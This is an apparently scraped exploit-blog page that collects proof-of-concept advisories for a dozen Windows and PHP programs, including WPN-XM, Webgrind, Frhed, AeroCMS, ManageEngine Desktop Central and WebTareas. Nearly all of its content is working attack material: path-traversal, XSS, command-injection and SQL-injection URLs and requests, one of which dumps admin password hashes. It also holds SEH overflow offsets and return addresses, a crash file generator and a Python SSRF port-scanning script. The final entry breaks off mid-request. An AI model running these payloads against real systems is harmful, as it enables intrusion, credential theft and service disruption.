# Exploit Title: WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-13
# Vendor Homepage: http://wpn-xm.org/
# Software Link : https://github.com/WPN-XM/WPN-XM/
# Tested Version: 0.8.6
# Tested on: Windows 10 using XAMPP
# Vulnerability Type: Local File Inclusion (LFI) & directory traversal
(path traversal)
CVSS v3: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-829, CWE-22
Vulnerability description: WPN-XM Serverstack for Windows v0.8.6 allows
unauthenticated directory traversal and Local File Inclusion through the
parameter in an /tools/webinterface/index.php?page=..\..\..\..\..\..\hello
(without php) GET request.
Proof of concept:
To detect: http://localhost/tools/webinterface/index.php?page=)
The parameter "page" can be modified and load a php file in the server.
Example, In C:\:hello.php with this content:
C:\>type hello.php
<?php
echo "HELLO FROM C:\\hello.php";
?>
To Get hello.php in c:\ :
http://localhost/tools/webinterface/index.php?page=..\..\..\..\..\..\hello
Note: hello without ".php".
And you can see the PHP message into the browser at the start.
Response:
HELLO FROM C:\hello.php<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>WP?-XM Server Stack for Windows - 0.8.6</title>
<meta name="description" content="WP?-XM Server Stack for Windows -
Webinterface.">
<meta name="author" content="Jens-André Koch" />
<link rel="shortcut icon" href="favicon.ico" />
# Vulnerability Type: reflected Cross-Site Scripting (XSS)
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: WPN-XM Serverstack for Windows v0.8.6, does not
sufficiently encode user-controlled inputs, resulting in a reflected
Cross-Site Scripting (XSS) vulnerability via the
/tools/webinterface/index.php, in multiple parameters.
Proof of concept:
http://localhost/tools/webinterface/index.php?action=showtab%3Cscript%3Ealert(1);%3C/script%3E&page=config&tab=help
http://localhost/tools/webinterface/index.php?action=showtab&page=config%3Cscript%3Ealert(1);%3C/script%3E&tab=help
http://localhost/tools/webinterface/index.php?action=showtab&page=config&tab=help%3Cscript%3Ealert(1);%3C/script%3E
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863117670
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-13
# Vendor Homepage: http://github.com/jokkedk/webgrind/
# Software Link : http://github.com/jokkedk/webgrind/
# Tested Version: 1.1
# Tested on: Windows 10 using XAMPP
# Vulnerability Type: Remote Command Execution (RCE)
CVSS v3: 9.8
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-434
Vulnerability description: Remote Command Execution (RCE) vulnerability in Webgrind <= 1.1 allow remote unauthenticated attackers to inject OS commands via /<webgrind_path_directory>/index.php in dataFile parameter.
Proof of concept:
http://localhost/tools/webgrind/index.php?dataFile=0%27%26calc.exe%26%27&showFraction=0.9&op=function_graph
And the calc.exe opens.
Note: 0'&calc.exe&', & char is neccesary to execute the command.
# Vulnerability Type: reflected Cross-Site Scripting (XSS)
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Vulnerability description: Webgrind v1.1 and before, does not sufficiently
encode user-controlled inputs, resulting in a reflected Cross-Site
Scripting (XSS) vulnerability via the /<webgrind_path_directory>/index.php,
in file parameter.
Proof of concept:
http://localhost/webgrind/index.php?op=fileviewer&file=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctitle%3E
Response:
...
<title>
webgrind - fileviewer: </title><script>alert(1);</script><title> </title>
<script type="text/javascript" charset="utf-8">
# Exploit Title: Frhed (Free hex editor) v1.6.0 - Buffer overflow
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-01-09
# Vendor Homepage: http://frhed.sourceforge.net/
# Software Link : http://frhed.sourceforge.net/
# Tested Version: 1.6.0
# Tested on: Windows 10
CVSS v3: 7.3
CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119
Buffer overflow controlling the Structured Exception Handler (SEH) records
in Frhed (Free hex editor) v1.6.0, and possibly other versions, may allow
attackers to execute arbitrary code via a long file name argument.
Proof of concept:
Open Frhed.exe from command line with a large string in Arguments, more
than 494 chars:
File '<Frhed_PATH>\Frhed.exe'
Arguments
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'
SEH chain of main thread
Address SE handler
0018FC8C 41367141
35714134 *** CORRUPT ENTRY ***
0BADF00D [+] Examining SEH chain
0BADF00D SEH record (nseh field) at 0x0018fc8c overwritten with
normal pattern : 0x35714134 (offset 494), followed by 876 bytes of cyclic
data after the handler
0BADF00D ------------------------------
'Targets' =>
[
[ '<fill in the OS/app version here>',
{
'Ret' => 0x00401ba7, #
pop ecx # pop ecx # ret - Frhed.exe (change this value by other without
\x00)
'Offset' => 494
}
],
],
# Exploit Title: Explorer32++ 1.3.5.531 - Buffer overflow
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-01-09
# Vendor Homepage: http://www.explorerplusplus.com/
# Software Link : http://www.explorerplusplus.com/
# Tested Version: 1.3.5.531
# Tested on: Windows 10
CVSS v3: 7.3
CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119
Buffer overflow controlling the Structured Exception Handler (SEH) records
in Explorer++ 1.3.5.531, and possibly other versions, may allow attackers
to execute arbitrary code via a long file name argument.
Proof of concept:
Open Explorer32++.exe from command line with a large string in Arguments,
more than 396 chars:
File '<Explorer++_PATH>\Explorer32++.exe'
Arguments
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'
SEH chain of main thread
Address SE handler
0018FB14 00690041
00370069 *** CORRUPT ENTRY ***
0BADF00D [+] Examining SEH chain
0BADF00D SEH record (nseh field) at 0x0018fb14 overwritten with
unicode pattern : 0x00370069 (offset 262), followed by 626 bytes of cyclic
data after the handler
# Exploit Title: Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 10-13-2022
# Vendor Homepage: https://pjo2.github.io/tftpd64/
# Software Links : https://bitbucket.org/phjounin/tftpd64/downloads/Tftpd32_SE-4.60-setup.exe
# Tested Version: 4.60
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Home 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
Tftpd32 service edition Tftpd32_svc C:\Program Files (x86)\Tftpd32_SE\tftpd32_svc.exe Auto
C:\>sc qc Tftpd32_svc
NOMBRE_SERVICIO: Tftpd32_svc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Tftpd32_SE\tftpd32_svc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Tftpd32 service edition
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# Exploit Title: Resource Hacker 3.6.0.92 - Buffer overflow
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-01-06
# Vendor Homepage: http://www.angusj.com/resourcehacker/
# Software Link : http://www.angusj.com/resourcehacker/
# Tested Version: 3.6.0.92
# Tested on: Windows 10
CVSS v3: 7.3
CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119
Heap-based buffer overflow controlling the Structured Exception Handler
(SEH) records in Reseource Hacker v3.6.0.92, and possibly other versions,
may allow attackers to execute arbitrary code via a long file name argument.
Proof of concept:
Open ResHacker.exe from command line with a large string in Arguments, more
than 268 chars:
File 'C:\ResourceHacker36\ResHacker.exe'
Arguments
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac...'
SEH chain of main thread
Address SE handler
0018FCB4 316A4130
6A413969 *** CORRUPT ENTRY ***
0BADF00D [+] Examining SEH chain
0BADF00D SEH record (nseh field) at 0x0018fcb4 overwritten with
normal pattern : 0x6a413969 (offset 268), followed by 12 bytes of cyclic
data after the handler
0BADF00D ------------------------------
'Targets' =>
[
[ '<fill in the OS/app version here>',
{
'Ret' => 0x00426446, #
pop eax # pop ebx # ret - ResHacker.exe (change this value from Mona,
with a not \x00 ret address)
'Offset' => 268
}
],
],
# Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS
# Software Link: https://github.com/MegaTKC/AeroCMS
# Version: 0.0.1
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Example SQL Injection
-----------------------------------------------------------------------------------------------------------------------
Param: search
-----------------------------------------------------------------------------------------------------------------------
Req sql ini detect
-----------------------------------------------------------------------------------------------------------------------
POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 21
search=245692'&submit=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 03:07:06 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3466
Connection: close
Content-Type: text/html; charset=UTF-8
[...]
Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 21
search=245692''&submit=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 03:07:10 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94216
[...]
-----------------------------------------------------------------------------------------------------------------------
Req exploiting sql ini get data admin
-----------------------------------------------------------------------------------------------------------------------
POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 113
search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 05:40:05 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101144
[...]
<a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>
[...]
-----------------------------------------------------------------------------------------------------------------------
Other URL and params
-----------------------------------------------------------------------------------------------------------------------
/AeroCMS-master/admin/posts.php [post_title]
/AeroCMS-master/admin/posts.php [filename]
/AeroCMS-master/admin/profile.php [filename]
/AeroCMS-master/author_posts.php [author]
/AeroCMS-master/category.php [category]
/AeroCMS-master/post.php [p_id]
/AeroCMS-master/search.php [search]
/AeroCMS-master/admin/categories.php [cat_title]
/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]
/AeroCMS-master/admin/posts.php [post_content]
/AeroCMS-master/admin/posts.php [p_id]
/AeroCMS-master/admin/posts.php [post_category_id]
/AeroCMS-master/admin/posts.php [post_title]
/AeroCMS-master/admin/posts.php [reset]
# Exploit Title: Scdbg 1.0 - Buffer overflow DoS
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-06-13
# Vendor Homepage: http://sandsprite.com/blogs/index.php?uid=7&pid=152
# Software Link : https://github.com/dzzie/VS_LIBEMU
# Tested Version: 1.0 - Compile date: Jun 3 2021 20:57:45
# Tested on: Windows 7, 10
CVSS v3: 7.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE: CWE-400
Vulnerability description: scdbg.exe (all versions) is affected by a Denial
of Service vulnerability that occurs when you use the /foff parameter or
not with a specific shellcode causing it to shutdown. Any malware could use
this option to evade the scan.
Proof of concept:
Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -f
scdbg_crash.bin / scdbg.exe -f scdbg_crash.bin
#!/usr/bin/env python
crash = "\x90\xF6\x84\x01\x90\x90\x90\x90"
f = open ("scdbg_crash.bin", "w")
f.write(crash)
f.close()
You can use gui_launcher.exe and check "Start offset 0x": 1 or directly
without check
[image: image.png]
# Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-02-14
# Software Link : http://www.desktopcentral.com
# Tested Version: 9.1.0 (Build No: 91084)
# Tested on: Windows 10
# Vulnerability Type: CRLF injection (CRLF) - 1
CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-93
Vulnerability description: CRLF injection vulnerability in ManageEngine
Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP
headers and conduct HTTP response splitting attacks via the fileName
parameter in a /STATE_ID/1613157927228/InvSWMetering.csv.
Proof of concept:
GET
https://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true
HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: keep-alive
Referer:
https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
Upgrade-Insecure-Requests: 1
Content-Length: 0
Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;
STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;
showRefMsg=false; summarypage=false;
DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;
JSESSIONID=0B20DEF653941DAF5748931B67972CDB;
JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
Host: localhost
Response:
HTTP/1.1 200 OK
Date:
Server: Apache
Pragma: public
Cache-Control: max-age=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;
Secure
Set-Cookie: buildNum=91084; Path=/
Set-Cookie: showRefMsg=false; Path=/
Set-Cookie: summarypage=false; Path=/
Set-Cookie: dc_customerid=1; Path=/
Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
Set-Cookie: screenResolution=1280x1024; Path=/
Content-Disposition: attachment; filename=any
Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csv
X-dc-header: yes
Content-Length: 95
Keep-Alive: timeout=5, max=20
Connection: Keep-Alive
Content-Type: text/csv;charset=UTF-8
# Vulnerability Type: CRLF injection (CRLF) - 2
CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-93
Vulnerability description: CRLF injection vulnerability in ManageEngine
Desktop Central 9.1.0 allows remote attackers to inject arbitrary HTTP
headers and conduct HTTP response splitting attacks via the fileName
parameter in a /STATE_ID/1613157927228/InvSWMetering.pdf.
Proof of concept:
GET
https://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=true
HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: keep-alive
Referer:
https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMetering
Upgrade-Insecure-Requests: 1
Content-Length: 0
Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;
STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;
showRefMsg=false; summarypage=false;
DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;
JSESSIONID=0B20DEF653941DAF5748931B67972CDB;
JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024
Host: localhost
HTTP/1.1 200 OK
Date:
Server: Apache
Pragma: public
Cache-Control: max-age=0
Expires: Wed, 31 Dec 1969 16:00:00 PST
SET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;
Secure
Set-Cookie: buildNum=91084; Path=/
Set-Cookie: showRefMsg=false; Path=/
Set-Cookie: summarypage=false; Path=/
Set-Cookie: dc_customerid=1; Path=/
Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/
Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/
Set-Cookie: screenResolution=1280x1024; Path=/
Content-Disposition: attachment; filename=any
Set-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013
X-dc-header: yes
Content-Length: 4470
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/pdf;charset=UTF-8
# Vulnerability Type: Server-Side Request Forgery (SSRF)
CVSS v3: 8.0
CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-918 Server-Side Request Forgery (SSRF)
Vulnerability description: Server-Side Request Forgery (SSRF) vulnerability
in ManageEngine Desktop Central 9.1.0 allows an attacker can force a
vulnerable server to trigger malicious requests to third-party servers or
to internal resources. This vulnerability allows authenticated attacker
with network access via HTTP and can then be leveraged to launch specific
attacks such as a cross-site port attack, service enumeration, and various
other attacks.
Proof of concept:
Save this content in a python file (ex. ssrf_manageenginedesktop9.py),
change the variable sitevuln value with ip address:
import argparse
from termcolor import colored
import requests
import urllib3
import datetime
urllib3.disable_warnings()
print(colored('''
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
''',"red"))
def smtpConfig_ssrf(target,port,d):
now1 = datetime.datetime.now()
text = ''
sitevuln = 'localhost'
url = 'https://
'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin%
40manageengine.com
&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin%
40manageengine.com'
cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73;
buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false;
JSESSIONID=D10A9C62D985A0966647099E14C622F8;
DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0'
try:
response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0
(Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':
'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': '
https://192.168.56.250:8383/smtpConfig.do','Cookie':
cookie,'Connection': 'keep-alive'},verify=False, timeout=10)
text = response.text
now2 = datetime.datetime.now()
rest = (now2 - now1)
seconds = rest.total_seconds()
if ('updateRefMsgCookie' in text):
return colored('Cookie lost',"yellow")
if d == "0":
print ('Time response: ' + str(rest) + '\n' + text + '\n')
if (seconds > 5.0):
return colored('open',"green")
else:
return colored('closed',"red")
except:
now2 = datetime.datetime.now()
rest = (now2 - now1)
seconds = rest.total_seconds()
if (seconds > 10.0):
return colored('open',"green")
else:
return colored('closed',"red")
return colored('unknown',"yellow")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 -
SSRF Open ports",required=True)
parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9
- SSRF Open ports",required=True)
parser.add_argument('-d','--debug', help="ManageEngine Desktop Central
9 - SSRF Open ports (0 print or 1 no print)",required=False)
args = parser.parse_args()
timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug)
print (args.ip + ':' + args.port + ' ' + timeresp + '\n')
And:
$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
192.168.56.250:8080 open
$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777
------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------
192.168.56.250:7777 closed
# Exploit Title: Hex Workshop v6.7 - Buffer overflow DoS
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-01-06
# Vendor Homepage: http://www.bpsoft.com, http://www.hexworkshop.com
# Software Link : http://www.bpsoft.com, http://www.hexworkshop.com
# Tested Version: v6.7
# Tested on: Windows 10
CVSS v3: 7.3
CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119
Hex Workshop v6.7 is vulnerable to denial of service via a command line
file arguments and control the Structured Exception Handler (SEH) records.
Proof of concept:
Open HWorks32.exe from command line with a large string in Arguments, more
than 268 chars:
File 'C:\Hex Workshop\HWorks32.exe'
Arguments
'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag..."
0BADF00D [+] Examining SEH chain
0BADF00D SEH record (nseh field) at 0x0089e63c overwritten with
unicode pattern : 0x00390069 (offset 268), followed by 0 bytes of cyclic
data after the handler
The application crash.
# Exploit Title: WebTareas 2.4 - SQL Injection (Unauthorised)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Software Link: https://sourceforge.net/projects/webtareas/
# Version: 2.4
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Example
-----------------------------------------------------------------------------------------------------------------------
Param: webTareasSID in cookie
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/administration/admin.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout
Connection: close
Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z''
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 302 Found
Date: Sat, 15 Oct 2022 11:38:50 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: ../service_site/home.php?msg=permissiondenied
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /webtareas/administration/admin.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout
Connection: close
